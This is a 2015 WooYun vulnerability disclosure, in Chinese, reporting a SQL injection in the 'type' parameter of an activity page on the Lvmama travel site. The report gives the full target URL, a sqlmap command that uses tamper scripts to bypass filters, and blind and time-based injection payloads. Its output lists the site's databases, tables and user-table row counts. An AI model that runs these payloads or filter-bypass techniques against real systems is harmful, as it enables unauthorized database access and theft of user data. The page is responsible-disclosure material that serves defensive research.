当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0153479

漏洞标题:驴妈妈旅游某站存在tamper绕过SQL注入(几万活动用户信息)

相关厂商:驴妈妈旅游网

漏洞作者: 路人甲

提交时间:2015-11-11 09:38

修复时间:2015-12-26 11:36

公开时间:2015-12-26 11:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-11: 细节已通知厂商并且等待厂商处理中
2015-11-11: 厂商已经确认,细节仅向厂商公开
2015-11-21: 细节向核心白帽子及相关领域专家公开
2015-12-01: 细节向普通白帽子公开
2015-12-11: 细节向实习白帽子公开
2015-12-26: 细节向公众公开

简要描述:

另外一个网站,抓包过程中发现一处有注入!~~~

详细说明:

注入地址:
http://m.lvmama.com/activity/index.php?s=L1509/shiyiCityDataInfo&v=0.708363635931164&callback=jQuery17204791056409012526_1447160601872&city=bj&type=bj_zby&_=1447160650217
其中type存在注入
sqlmap测试
sqlmap.py -u "http://m.lvmama.com/activity/index.php?s=L1509/shiyiCityDataInfo&v=0.708363635931164&callback=jQuery17204791056409012526_1447160601872&city=bj&type=bj_zby&_=1447160650217" --threads 10 --current-user --current-db --is-dba -p type --tamper between.py,randomcase.py,space2comment.py

1.jpg


2.jpg


3.jpg


4.jpg


5.jpg


[22:23:37] [DEBUG] cleaning up configuration parameters
[22:23:37] [INFO] loading tamper script 'between'
[22:23:37] [INFO] loading tamper script 'randomcase'
[22:23:37] [INFO] loading tamper script 'space2comment'
[22:23:37] [DEBUG] setting the HTTP timeout
[22:23:37] [DEBUG] setting the HTTP method to GET
[22:23:37] [DEBUG] creating HTTP requests opener object
[22:23:37] [INFO] resuming back-end DBMS 'mysql'
[22:23:37] [INFO] testing connection to the target URL
[22:23:37] [INFO] heuristics detected web page charset 'UTF-8'
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: type
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: s=L1509/shiyiCityDataInfo&v=0.708363635931164&callback=jQuery172047
91056409012526_1447160601872&city=bj&type=bj_zby') AND 3183=3183 AND ('oyRu'='oy
Ru&_=1447160650217
Vector: AND [INFERENCE]
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: s=L1509/shiyiCityDataInfo&v=0.708363635931164&callback=jQuery172047
91056409012526_1447160601872&city=bj&type=bj_zby') AND SLEEP(5) AND ('iPPV'='iPP
V&_=1447160650217
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
[22:23:37] [WARNING] changes made by tampering scripts are not included in shown
payload content(s)
[22:23:37] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11
[22:23:37] [INFO] fetching current user
[22:23:37] [INFO] retrieving the length of query output
[22:23:37] [INFO] resumed: 25
[22:23:37] [DEBUG] performed 0 queries in 0.00 seconds
[22:23:37] [INFO] resumed: lvtu-activity@192.168.%.%
[22:23:37] [DEBUG] performed 0 queries in 0.00 seconds
current user: 'lvtu-activity@192.168.%.%'
[22:23:37] [INFO] fetching current database
[22:23:37] [INFO] retrieving the length of query output
[22:23:37] [INFO] resumed: 8
[22:23:37] [DEBUG] performed 0 queries in 0.00 seconds
[22:23:37] [INFO] resumed: activity
[22:23:37] [DEBUG] performed 0 queries in 0.00 seconds
current database: 'activity'
[22:23:37] [INFO] testing if current user is DBA
[22:23:37] [INFO] fetching current user
[22:23:37] [PAYLOAD] bj_zby')/**/And/**/(sElEcT/**/(cAse/**/wHeN/**/((sElEcT/**/
super_priv/**/fRoM/**/mysql.uSEr/**/wHeRe/**/uSEr=0x6c7674752d6163746976697479/*
*/liMIT/**/0,1)=0x59)/**/tHEN/**/1/**/elsE/**/0/**/ENd))=1/**/And/**/('gclI'='gc
lI
[22:23:37] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
current user is DBA: False
available databases [10]:
[*] activity
[*] back
[*] client_back
[*] client_crm
[*] information_schema
[*] mysql
[*] performance_schema
[*] quartz
[*] test
[*] train
Database: activity
[51 tables]
+--------------------------------+
| client_crm.r_reviews_choujiang |
| act_answer |
| act_bgjl |
| act_choujiang |
| act_choujiang_config |
| act_coupcode_config |
| act_mobile_log |
| act_products |
| act_security_code |
| act_weixin_like |
| act_weixin_red_envelope |
| act_weixin_show_user |
| act_weixin_theme_hotspring |
| act_weixin_yuepao |
| act_wq_keep_health |
| act_xiaoaojianghu_apprentice |
| act_xiaoaojianghu_master |
| act_xiaoaojianghu_registration |
| act_xiaoaojianghu_scripts |
| act_yongjiebao |
| bomb_act_lvyue |
| choujiang519 |
| choujiang519_log |
| choujiang_lingshan |
| choujiang_log |
| choujiang_policy |
| kangshifu |
| limei |
| m_stock_info |
| m_user_moon |
| m_zhongqiu |
| nonghang |
| quiz_360 |
| quiz_option |
| quiz_question |
| quiz_score |
| quiz_user |
| quiz_womai |
| share_log |
| w_activity |
| w_activity_gift |
| w_activity_user |
| w_gift |
| w_log |
| weiquan |
| weixin |
| world_cup |
| yujia_teacher |
| yujia_users |
| zhuanpan |
| zpk_reserve_order |
+--------------------------------+
Database: activity
+--------------------------+---------+
| Table | Entries |
+--------------------------+---------+
| w_activity_user | 26419 |
| weixin | 8395 |
| yujia_users | 6726 |
| act_weixin_show_user | 13 |
| quiz_user | 12 |
| act_xiaoaojianghu_master | 3 |
+--------------------------+---------+


太慢了,就不继续了!~~~

漏洞证明:

如上

修复方案:

过滤修复!~~~

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-11-11 11:35

厂商回复:

thx, 你给的sqlmap不对吧,我怎么扫不出来?

最新状态:

暂无


漏洞评价:

评论